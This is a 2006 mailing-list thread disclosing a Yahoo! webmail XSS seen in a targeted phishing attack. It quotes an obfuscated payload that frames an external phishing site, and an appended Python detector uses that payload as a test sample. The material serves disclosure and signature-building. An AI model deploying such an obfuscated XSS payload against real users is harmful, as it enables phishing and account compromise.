Dailydave mailing list archives
RE: [Argeniss] Alert - Yahoo! Webmail XSS
From: "El Nahual" <nahual () g-con org>
Date: Tue, 18 Apr 2006 12:47:10 -0500
Whoa dudes are fast ... Site is down now .. since it tries to connect to another IP =)

-----Original Message-----
From: Cesar [mailto:sqlsec () yahoo com]
Sent: Monday, April 17, 2006 02:15 p.m.
To: dailydave () lists immunitysec com
Subject: [Dailydave] [Argeniss] Alert - Yahoo! Webmail XSS

Hi.

I just got a targeted phishing attack to one of my Yahoo email accounts, what's interesting is that the attack exploits a Yahoo! webmail 0day XSS vulnerability. I'm contacting Yahoo right now but in the meantime I thought it will be good to provide some bits because of the seriousness of this.

When you browse a message on Yahoo! Webmail the XSS exploit creates a frameset and redirects to http://w00tynetwork.com/x/ , it's interesting that the address bar at IE doesn't refresh to show the actual URL, you can only see the redirection to http://w00tynetwork.com/x/ on IE status bar if you have it visible.

I don't know if this vulnerability is being exploited in the wild since it was a targeted attack.

Here is an extract from the exploit so you can start building some signatures, filtering, etc.

-----------------------------------
(java/**/script:document.write('<frameset cols=100% rows=100% border=0 frameboarder=0framespacing=0><frame frameborder=0 src=http://w00tynetwork.com/x/></frameset>'))
-----------------------------------

I will provide full details later when Yahoo! fixes the issue. If security vendors are interested in full details please ask for them at info>at<argeniss>.<com

Cesar.
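For the signature and filtering use mentioned in the alert, an added example (not part of the thread and not Argeniss code): a Python check that removes `/*...*/` comments and control characters before looking for a script scheme, so the split `java/**/script:` form is caught, and that reports frames loading an external URL. The function names and the two extra samples are assumptions made for illustration.

```python
import re

_COMMENT = re.compile(r"/\*.*?\*/", re.S)   # /* ... */ used to split keywords
_CONTROL = re.compile(r"[\x00-\x1f]+")      # tabs, newlines, other control chars
_SCHEME = re.compile(r"(?:java|vb|live)script:", re.I)
_FRAME = re.compile(r"<\s*(?:frameset|frame|iframe)\b[^>]*", re.I)
_SRC = re.compile(r"src\s*=\s*[\"']?(https?://[^\s\"'>]+)", re.I)

# The extract quoted in the alert above, unchanged.
PAGE_EXTRACT = ("(java/**/script:document.write('<frameset cols=100% rows=100% "
                "border=0 frameboarder=0framespacing=0><frame frameborder=0 "
                "src=http://w00tynetwork.com/x/></frameset>'))")
# Constructed samples, not from the thread.
BENIGN = "Notes from the javascript training are at http://example.com/agenda"
PLAIN = '<a href="javascript:void(0)">menu</a>'


def normalize(text):
    """Drop comments and control characters so a split scheme name rejoins."""
    return _CONTROL.sub("", _COMMENT.sub("", text))


def scan(body):
    """Return (rule, detail) findings for one message body."""
    findings = []
    if _SCHEME.search(normalize(body)):
        # If the raw text does not match, the scheme was hidden from naive filters.
        hidden = _SCHEME.search(body) is None
        findings.append(("script-scheme", "obfuscated" if hidden else "plain"))
    for tag in _FRAME.finditer(body):
        src = _SRC.search(tag.group(0))
        if src:
            findings.append(("external-frame", src.group(1)))
    return findings


if __name__ == "__main__":
    for name, sample in (("page extract", PAGE_EXTRACT),
                         ("benign", BENIGN), ("plain", PLAIN)):
        print(name, scan(sample))
```

A literal match on `javascript:` misses the page's extract; the "obfuscated" label marks exactly that case, which is worth alerting on separately because legitimate mail has no reason to split the scheme name.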